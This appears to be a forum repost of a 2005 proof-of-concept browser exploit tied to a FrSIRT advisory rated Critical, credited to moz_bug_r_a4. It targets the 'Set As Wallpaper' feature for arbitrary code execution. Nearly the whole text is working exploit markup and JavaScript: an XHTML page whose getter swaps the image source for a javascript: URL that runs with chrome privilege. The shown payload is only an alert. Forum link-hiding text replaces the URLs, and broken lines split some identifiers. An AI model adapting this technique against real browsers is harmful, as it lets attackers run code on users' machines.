Advisory : FrSIRT/ADV-2005-1075 (issue #2)
Rated as : Critical
// Exploit by moz_bug_r_a4
<?xml version="1.0"?>
<html xmlns="
Para ver este enlace Registrate o Inicia Sesion">
<head>
<style>
IMG {
display: block;
width: 96px; height: 96px;
border: 1px solid #f00;
/*background-image: url("
Para ver este enlace Registrate o Inicia Sesion");*/
background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUg
AAABAAAAAQCAYA
AAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29md
HdhcmUAQWRvYmU
gSW1hZ2VSZWFke
XHJZTwAAAHWSUR
BVHjaYvz//z8DJQAg
gJiQOe/fv2fv7Oz8rays/N+VkfG/iYnJfyD/1+rVq7ffu3dPFpsBAAHEAHIBCJ85c8bN
2Nj4vwsDw/8zQLwKiO8CcRoQu0DxqlWrdsHUwzBAAIGJmTNnPgYa9j8UqhFElwP
xf2MIDeIrKSn9F
wSJoRkAEEAM0DD
4DzMAyPi/G+QKY4hh5WAXGf8PDQ0FGwJ2
2d27CjADAAIIrL
mjo+MXA9R2kAHvGBA2wwx6B8W7od6CeQcggKCmCEL8bgwx
YCbUIGTDVkHDBi
a+CuotgACCueD3TDQN75D4xmAvCoK9ARMHBzAw0AECiBH
kAlC0Mdy7x9ABN
A3obAZXIAa6iKE
cGlMVQHwWyjYuL
2d4v2cPg8vZswx
7gHyAA
AK7AOif7SAbOqC
mn4Ha3AHFsIDtg
Pq/vLz8P4MSkJ2W9h8ggBjevXvHDo4FQUQ
g/kdypqCg4H8lUIACnQ/SOBMYI8bAsAJFPcj1AAEEjwVQqLpAbXmH5BJjqI0gi9D
TAAgDBBCcAVLkg
mQ7yKCZxpCQxqU
ZhAECCJ4XgMl49
3ug21ZD+aDAXH0WL
M4A9MZPXJkJIIA
wTAR5pQMalaCAB
QUULttBGCCAGCn
NzgABBgAMJ5THw
GvJL
AAAAABJRU5ErkJ
ggg==");
}
</style>
</head>
<body>
<h3>Arbitrary code execution via setWallpaper()</h3>
1. Right click on the image.
2. Choose "Set As Wallpaper..." from the context menu.
A dialog that shows Components.sta ck will appear.
<IMG id="i"/>
<script>
<![CDATA[
var sx = navigator.prod
uctSub < 20050622 ? 2 : 4;
// it needs chrome privilege to get |Components.stack|
var code = "alert('Exploit!\\n\\n' + Components.sta
ck);";
var evalCode = code.replace(/'/g, '"').replace(/\\/g, '\\\\');
var u = [ "
Para ver este enlace Registrate o Inicia Sesion",
"javascript:eval('" + evalCode + "')" ];
var sc = 0;
var i = document.getEl
ementById("i");
i.addEventList
ener("contextmenu", function(e) { sc = 0; }, false);
i.__defineGett
er__("src", function() {
//return (confirm(++sc)) ? u[0] : u[1];
return (++sc < sx) ? u[0] : u[1];
});
]]>
</script>
</body>
</html>
Autor